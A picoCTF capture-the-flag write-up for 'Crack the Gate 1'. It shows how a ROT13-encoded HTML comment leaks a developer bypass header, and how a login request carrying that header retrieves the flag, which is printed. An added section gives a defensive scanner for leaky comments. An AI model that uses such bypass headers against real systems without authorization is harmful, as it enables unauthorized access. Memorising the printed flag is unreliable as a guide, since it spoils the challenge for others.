
picoCTF WriteUp | Crack the Gate 1

R4shSec
Author

Introduction

Hey everyone 👋 In this Capture The Flag (CTF) challenge, the description tells us that someone, ctf player, has left sensitive data in a web portal and logs in with the email address ctf-player@picoctf.org. Let’s investigate! 🔎

Web Page

We’re brought to a login page that asks for an email and a password. Let’s look at the source code.

Source Code

That’s interesting! Looking at the source code, we can see something hidden:

 <!-- ABGR: Wnpx - grzcbenel olcnff: hfr urnqre "K-Qri-Npprff: lrf" -->
  <!-- Remove before pushing to production! -->   

Decoding

Hmm... it looks like ROT13. Let’s use CyberChef to decode it.

We could see some text!

Jack - temporary bypass: use header "X-Dev-Access: yes"
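
A pre-release check for this kind of leak, as an added example that is not part of the original writeup: it scans page source for HTML comments and tests each one both as written and after ROT13. The function name and keyword list are assumptions, and the sample page is constructed around the two comments quoted above.

```python
import codecs
import re

# Words that should not appear in comments shipped to clients (assumed list).
KEYWORDS = ("bypass", "password", "secret", "token", "header", "remove before")
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)


def scan_html_comments(html):
    """Return (line, encoding, text) for each comment that leaks a keyword.

    Each comment is checked as written and after ROT13, because ROT13 is an
    obfuscation any reader can undo, not a protection.
    """
    findings = []
    for match in COMMENT_RE.finditer(html):
        raw = " ".join(match.group(1).split())  # collapse whitespace
        line = html.count("\n", 0, match.start()) + 1
        for encoding, text in (("plain", raw), ("rot13", codecs.decode(raw, "rot13"))):
            if any(k in text.lower() for k in KEYWORDS):
                findings.append((line, encoding, text))
    return findings


# Constructed sample page; the first two comments are the ones quoted above.
SAMPLE = """<html>
<body>
  <form id="login"><input name="email"><input name="password"></form>
  <!-- ABGR: Wnpx - grzcbenel olcnff: hfr urnqre "K-Qri-Npprff: lrf" -->
  <!-- Remove before pushing to production! -->
  <!-- layout: two columns -->
</body>
</html>"""

if __name__ == "__main__":
    # Run over built templates in CI and fail the build on any finding.
    for line, encoding, text in scan_html_comments(SAMPLE):
        print(f"line {line} [{encoding}]: {text}")
```

The comment is only the symptom: the server-side code that honours the header is what has to be removed before release.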

Requests

We could use the developer console, which you can open with Ctrl+Shift+I.

We use Reqbin to send the HTTP request.

Enter the following as the JSON payload:

{"email":"ctf-player@picoctf.org","password":"sssssss"}

Use http://amiable-citadel.picoctf.net:57281/login as the URL and POST as the request method. For the headers, add X-Dev-Access as the key and yes as the value.

Flag 🚩

We got a response!

{"success":true,"email":"ctf-player@picoctf.org","firstName":"pico","lastName":"player","flag":"picoCTF{brut4_f0rc4_125f752d}"}
picoCTF{brut4_f0rc4_125f752d}